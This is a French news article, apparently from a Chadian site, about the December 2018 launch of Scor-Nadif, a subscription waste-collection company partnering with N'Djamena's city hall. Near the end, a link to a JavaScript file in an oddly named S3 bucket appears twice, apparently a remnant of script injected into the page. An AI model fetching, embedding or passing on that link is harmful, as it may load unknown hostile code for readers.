Chasser l’insalubrité à tout prix à N’Djamena

0
591

La société Scor – Nadif Sarl a lancé officiellement hier 29 décembre 2018 ses activités en partenariat avec la mairie de N’Djamena à la bibliothèque nationale. C’était en présence du directeur général de ladite société, le maire de la commune du huitième et  des quelques responsables communaux.

C’est dans le cadre de la lutte contre l’insalubrité afin d’assainir la ville de N’Djamena que Scor – Nadif s’est assignée cette mission de ramassage, collecte, traitement, recyclage des ordures ménagères et d’incinération des déchets biomédicaux. La ville de N’Djamena voit du jour au lendemain croitre sa population les ordures avec d’où la nécessité de travailler aux côtés de la mairie centrale dans la gestion de collecte des ordures ménagères, transport et traitement des déchets solides et dans toute la ville de N’Djamena.

Bénéficier de ces services nécessite naturellement un abonnement auprès de cette société qui vient prêter main forte à la ville de N’Djamena. « Nous avons les éboueurs et ce sont eux qui seront en contact permanent avec nos clients et nos abonnés. Parce que pour bénéficier des services de Scor Nadif, il faut d’abord être abonné. Ceux-ci passeront de porte à porte pour expliquer à la population comment s’abonner. Et pour les équipements, nous avons une cinquantaine des motos tricycles, vingtaine de bennes à ordure ménagère qui seront là pour vous servir. C’est pas mal pour un début et nous allons faire de notre mieux pour travailler aux côtés de la mairie centrale » a expliqué le Directeur Général de la société Scor – Nadif M. Nour Abakia barka

Scor-Nadif est une société à responsabilité limitée qui est créée le 15 Août 2018. Elle fait partie de près cinq sociétés d’assainissement de la ville de N’Djamena qui sont entre autres : Propre net, établissement Mallah, emploi vert etc.

La présence du maire du huitième et de dixième arrondissement à cette cérémonie, prouve déjà que ces services sont fortement attendus. Et il ne serait pas mauvais que ces sociétés privées puissent prendre le dessus car, N’Djamena – Nadif qui est un service public d’assainissement de N’Djamena est presque, à son déclin.

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

https://s3-us-west-2.amazonaws.com/gyrgdd/deext.js

Facebook Comments

LAISSER UN COMMENTAIRE

S'il vous plaît entrez votre commentaire!
S'il vous plaît entrez votre nom ici